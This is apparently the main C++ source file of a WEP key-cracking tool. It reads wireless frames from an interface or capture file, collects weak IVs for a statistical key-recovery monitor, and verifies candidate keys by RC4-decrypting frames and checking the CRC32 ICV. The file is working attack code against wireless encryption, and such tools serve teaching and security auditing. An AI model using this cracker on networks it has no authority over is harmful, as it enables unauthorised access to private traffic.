#include <unistd.h> // getopt
#include <stdio.h>
#include <time.h> // time
#include <stdlib.h> // srand
#include <libgen.h> // basename

#include "WEPCrack.h"
#include "util.h"
#include "Generator.h"

#define SRC_MAIN "[main] "

/**
 * Predicate that checks whether a candidate WEP key correctly decrypts a
 * captured frame.
 *
 * The RC4 key is built from the I IV bytes found at packet offset 24,
 * followed by the candidate key. The bytes from offset 24+I+1 up to (but
 * excluding) the last four are decrypted and run through CRC32. The key is
 * accepted when the decrypted last four bytes match the computed CRC.
 *
 * The class derives from binary_function and exposes the argument typedefs
 * so that it can be used with bind2nd() (see main()). Note that
 * binary_function and bind2nd are deprecated in C++11 and removed in C++17.
 */
class CheckKey: public binary_function<const vector<byte>, const vector<byte>, bool> {
	private:
		int I; // IV length [words]
		int l; // key length [words]; stored but not used by operator()
		int N; // RC4 state size: number of distinct values per word

		// One RC4 PRGA step: advance (i, j), swap S[i] and S[j], and
		// return the next keystream byte.
		unsigned char nextKeystream(vector<unsigned char>& S, unsigned int& i, unsigned int& j) const {
			i = (i + 1) % N;
			j = (j + S[i]) % N;
			swap(S[i], S[j]);
			return S[ (S[i] + S[j]) % N ];
		}

	public:
		CheckKey(int I, int l, int N): I(I), l(l), N(N) { }

		typedef const vector<byte> first_argument_type;
		typedef const vector<byte> second_argument_type;
		typedef bool result_type;

		/**
		 * @param packet  captured frame: header, IV at offset 24, one more byte,
		 *                encrypted body, then 4 ICV bytes
		 * @param wep_key candidate secret key, without the IV
		 * @return true if the decrypted ICV matches the CRC32 of the decrypted
		 *         body. Returns false otherwise, including for frames too short
		 *         to hold the IV, the byte after it and a 4-byte ICV.
		 */
		result_type operator() (const vector<byte>& packet, const vector<byte>& wep_key) const {
			const size_t ivStart   = 24;              // first IV byte
			const size_t bodyStart = ivStart + I + 1; // first byte fed to the CRC
			const size_t icvLen    = 4;               // trailing ICV bytes

			// Short frames would otherwise be indexed out of bounds
			// (and packet.size()-4 would wrap around for size < 4).
			if (packet.size() < bodyStart + icvLen)
				return false;
			const size_t icvStart = packet.size() - icvLen;

			// RC4 key = IV || wep_key
			vector<byte> key(packet.begin() + ivStart, packet.begin() + ivStart + I);
			key.insert(key.end(), wep_key.begin(), wep_key.end());
			if (key.empty())
				return false; // the KSA below would take a modulo by zero

			// KSA. The S-box is a vector: variable-length arrays are not standard C++.
			vector<unsigned char> S(N);
			unsigned int i, j;
			for (i = 0; i < S.size(); i++)
				S[i] = i;
			j = 0;
			for (i = 0; i < S.size(); i++) {
				j = (j + S[i] + key[i % key.size()]) % N;
				swap(S[i], S[j]);
			}

			// Decrypt the body and accumulate its CRC32.
			CRC32 crc;
			i = 0; j = 0;
			for (size_t k = bodyStart; k < icvStart; k++) {
				unsigned char decr = nextKeystream(S, i, j) ^ packet[k];
				crc.Update(decr);
			}

			crc.Finish();

			// Decrypt the ICV and compare it with the CRC.
			for (int k = 0; k < 4; k++) {
				unsigned char decr = nextKeystream(S, i, j) ^ packet[icvStart + k];

				// ICV has reverse byte order
				if (crc[k] != decr)
					return false;
			}

			return true;
		}
};

/**
 * Value of a single hex digit, case-insensitive.
 * Assumes ch is one of [0-9a-fA-F]; other characters give meaningless results.
 * The cast to unsigned char avoids UB in tolower()/isdigit() for negative chars.
 */
static int hexNibble(char ch) {
	int c = tolower(static_cast<unsigned char>(ch));
	return isdigit(c) ? c - '0' : 10 + c - 'a';
}

/**
 * Decode a hex string into bytes, two digits per byte, most significant
 * nibble first (e.g. "0aFF" -> {0x0a, 0xff}).
 *
 * @param str hex digits. main() validates the string (hex only, even length)
 *            before calling. A trailing unpaired digit is ignored rather than
 *            being combined with the string terminator.
 * @return the decoded bytes
 */
vector<byte> string2key(string str) {
	vector<byte> rez;
	rez.reserve(str.size() / 2);
	for (size_t i = 0; i + 1 < str.size(); i += 2)
		rez.push_back((hexNibble(str[i]) << 4) | hexNibble(str[i + 1]));

	return rez;
}

/**
 * Print the command line help to stdout.
 *
 * @param progname argv[0]; only its basename is printed. Must be non-NULL.
 *                 POSIX basename() may modify the string it is given.
 */
void usage(char* progname) {

	assert(progname);

	char* prog = basename(progname);

	printf("usage: %s -i iface\n", prog);
	printf("       %s -r file\n", prog);
	printf("       %s -g len\n", prog);
	printf("       %s -G key\n\n", prog);

	// -I and -N are disabled (also absent from getopt's option string in main()).
	puts(
"options:"								"\n"
" -d level   set debug level (default: 2)"				"\n"
" -d ml      set debug level for module m to level l"			"\n"
" -f n       fork next key word when more than n guesses"		"\n"
" -g len     use random generator source with random key of length len"	"\n"
" -G key     use random generator source with specified key"		"\n"
" -h         this cruft"						"\n"
" -i iface   get frames from interface"					"\n"
// " -I num     set IV len"						"\n"
" -k keyid   crack key with keyid (default: any)"			"\n"
" -l num     set key length (default: 13)"				"\n"
" -L n       use -t value for first n key words (default: 2)"		"\n"
" -m mac     crack key for mac address (default: any)"			"\n"
" -M max     try to keep loadaverage at max level (default: 30)"	"\n"
// " -N num     set bits per word"					"\n"
" -r file    get frames from file"					"\n"
" -t n       use top n guesses for lower key words (see -L) (default: 3)"	"\n"
" -T n       use top n guesses for higher key words (default: 1)"	"\n"
									"\n"
"debug module names (option -d):"					"\n"
" c  crack"							"\n"
" g  generator"							"\n"
" m  monitor"							"\n"
" M  main"							"\n"
	);

}

int main(int argc, char *argv[]) {
	// set default values
	int I = 3; 	// IV len [words]
	int l = 13; 	// key len [words]
	int Nbits = 8;	// bits per word
	int N = 256;	// different values per word (= 2^Nbits)
	int top = 3;	// select top 3 guesses for some key word
	int top2 = 1;   // select top 1 guess for words higher than level
	int level = 2;	// use top for first 2 words, after that use top2
	int fork = 2;	// fork next word when at least 2 guesses for word exist
	int keyid = -1;	// use frames with this keyid
	int rand_len = -1; // random key length not set
	int loadavg = 30; // try to keep loadavg below this value
	vector<byte> rand_key; // random key
	string iface, file, mac;

	int debug_main=2; // debug level for main
	int debug_gen=2;  // debug level for generator module
	int debug_crack=2; // debug level for cracker threads
	int debug_mon=2; // debug level for monitor thread

	srand(time(NULL)); // set poor man's random seed for the whole program

	DebugPrint d("[main] ");
	d.setLevel(debug_main);

	while(1) {

		int param = getopt(argc, argv, "d:f:g:G:hi:k:l:L:m:M:r:t:T:");
		int temp;

		if (param == -1) // no more params
			break;

		switch(param) {
			case 'd':
				assert(optarg);
				if (isdigit(optarg[0])) { // just one digit -> set value for the whole program
					temp = atoi(optarg);
					if (temp <= 0)
						d.printWarning("debug <= 0, using defaults\n");
					else {
						debug_main = debug_gen = debug_crack = debug_mon = temp;
						d.setLevel(debug_main);
					}
				} else {
					temp = atoi(optarg+1);
					if (temp <= 0)
						d.printWarning("debug <= 0, using defaults\n");
					switch(optarg[0]) {
						case 'c': debug_crack = temp;
							  break;
						case 'M': debug_main = temp;
							  d.setLevel(debug_main);
							  break;
						case 'g': debug_gen = temp;
							  break;
						case 'm': debug_mon = temp;
							  break;
						default: d.printWarning("unknown debug module: %c\n", optarg[0]);
					}
				}
				break;
			case 'f':
				assert(optarg);
				temp = atoi(optarg);
				if (temp <= 0) 
					d.printWarning("fork <= 0, using defaults\n");
				else
					fork = temp;
				break;
			
			case 'g':
				assert(optarg);
				temp = atoi(optarg);
				if (temp <= 0) {
					d.printError("random key length <= 0");
					exit(1);
				}
				if (!file.empty() || !iface.empty() || 
						!rand_key.empty()) {
					d.printError("multiple packet sources set\n");
					exit(1);
				}
				rand_len = temp;
				l = rand_len;
				break;
				
			case 'G': {
				assert(optarg);
				string randkey = optarg;
				if (randkey.npos != randkey.find_first_not_of("0123456789abcdefABCDEF")) {
					d.printError("bad random key: non-hex digits found: %s\n", optarg);
					exit(1);
				}

				if (randkey.size()%2 != 0) {
					d.printError("bad random key: odd number of digits found: %s\n", optarg);
					exit(1);
				}
				
				if (!iface.empty() || !file.empty() || rand_len>0) {
					d.printError("multiple packet sources set\n");
					exit(1);
				}
				rand_key = string2key(randkey);
				break;
				  }
			case 'h':
				  usage(argv[0]);
				  exit(0);
			case 'i':
				if (!file.empty() || !rand_key.empty() || 
						rand_len > 0) {
					d.printError("multiple packet sources set\n");
					exit(1);
				}
				assert(optarg);
				iface = optarg;
				break;

			case 'I':
				assert(optarg);
				temp = atoi(optarg);
				if (temp <= 0)
					d.printWarning("IV len <= 0, using defaults\n");
				else
					I = temp;
				break;

			case 'k':
				assert(optarg);
				temp = atoi(optarg);
				if (temp < 0 || temp > 3)
					d.printWarning("keyid not in range [0,3], using defaults\n");
				else
					keyid = temp;
				break;

			case 'l':
				assert(optarg);
				temp = atoi(optarg);
				if (temp <= 0)
					d.printWarning("key lenght <=0, using defaults\n");
				else
					l = temp;
				break;

			case 'L':
				assert(optarg);
				temp = atoi(optarg);
				if (temp < 0)
					d.printWarning("level < 0, using defaults\n");
				else
					level = temp;
				break;

			case 'm':
				assert(optarg);
				mac = checkmac(optarg);
				if (mac.empty()) {
					d.printError("bad mac address: %s\n", optarg);
					exit(1);
				}
				break;

			case 'M':
				assert(optarg);
				temp = atoi(optarg);
				if (temp <= 0) {
					d.printError("loadaverage < 0, using defaults : %s\n", optarg);
					exit(1);
				} else
					loadavg = temp;
				break;

			case 'N':
				assert(optarg);
				temp = atoi(optarg);
				if (temp <= 0 || temp >8)
					d.printWarning("number of bits per word not in range [1,8], using defaults\n");
				else
					Nbits = temp;
					N = 1 << Nbits;
				break;
				
			case 'r':
				if (!iface.empty() || !rand_key.empty() ||
						rand_len > 0) {
					d.printError("multiple packet sources set\n");
					exit(1);
				}
				assert(optarg);
				file = optarg;
				break;

			case 't':
				assert(optarg);
				temp = atoi(optarg);
				if (temp <= 0)
					d.printWarning("top <= 0, using defaults\n");
				else
					top = temp;
				break;

			case 'T':
				assert(optarg);
				temp = atoi(optarg);
				if (temp <= 0)
					d.printWarning("top2 <= 0, using defaults\n");
				else
					top2 = temp;
				break;
		}
	}

	// check if any packet source set
	if (iface.empty() && file.empty() && rand_key.empty() && rand_len < 0) {
		d.printError("packet source not set\n\n");
		usage(argv[0]);
		exit(1);
	}

	d.printVerbose("IV length is %d\n", I);
	d.printVerbose("key length is %d\n", l);
	d.printVerbose("%d bits per word\n", Nbits);
	d.printVerbose("fork for top %d guesses when key word <= %d\n", top, level);
	d.printVerbose("fork for top %d guesses when key word > %d\n", top2, level);
	d.printVerbose("keep load average below %d\n", loadavg);
	if (keyid!=-1)
		d.printVerbose("keyid is %d\n", keyid);
	if ((!iface.empty() || !file.empty()) && !mac.empty())
		d.printVerbose("mac filter is %s\n", mac.c_str());
	if (!iface.empty())
		d.printVerbose("using interface %s\n", iface.c_str());
	if (!file.empty())
		d.printVerbose("using file %s\n", file.c_str());
	if (rand_len>0 && rand_len != l)
		d.printWarning("generator and wep key lengths differ (%d!=%d)\n", rand_len, l);
	
	WeakIV iv;
	Generator* gen = NULL;

	if (!file.empty() || !iface.empty()) 
		try {
			gen = new CaptureGenerator(
				file.empty()?iface.c_str():file.c_str(), 
				mac.empty()?NULL:mac.c_str(),
				keyid, !iface.empty(),
				debug_gen);
		} catch (runtime_error& err) {
			d.printError("error starting capture: %s\n", 
					err.what());
			exit(1);
		}

	else {
		if (rand_len > 0)
			gen = new RandomGenerator(rand_len, debug_gen);
		else
			gen = new RandomGenerator(rand_key, debug_gen);

	}

	assert(gen);
	gen->setDebugLevel(debug_gen);
	
	Monitor mon(I,l,N, top, level, fork, top2, loadavg, 
			debug_mon, debug_crack);

	vector<byte> key;
	vector<byte> packet;
	list<vector<byte> > test_packets;
	CheckKey key_checker(I,l,N);
	
	while(1) {
		bool newIV = false;
		bool newKey = false;

		if (test_packets.size() < 10) { // get packets & IVs
			if (gen->getPacket(packet)) {
				test_packets.push_back(packet);
				if (gen->extractIV(packet, iv)) {
					mon.addIV(iv);
					newIV = true;
				}
			}
		} else if (gen->getWeakIV(iv)) { // get only IVs
			mon.addIV(iv);
			newIV = true;
		}
		
		if (test_packets.size()>0 && mon.getNextKey(key)) {
			newKey = true;
			int n = count_if(test_packets.begin(), test_packets.end(), bind2nd(key_checker, key));

			if (n>0) {
				// always print key
				printf("[main] FOUND KEY (%d/%d): %s\n", n, test_packets.size(),
				  d.printVector("", key,":").c_str());
				exit(0);
			} else {
				d.printVerbose("%s\n",
				  d.printVector("bad key: ", key).c_str());
			}	
		}

		if (!newIV && !newKey)
			sleep(5);
	}
}
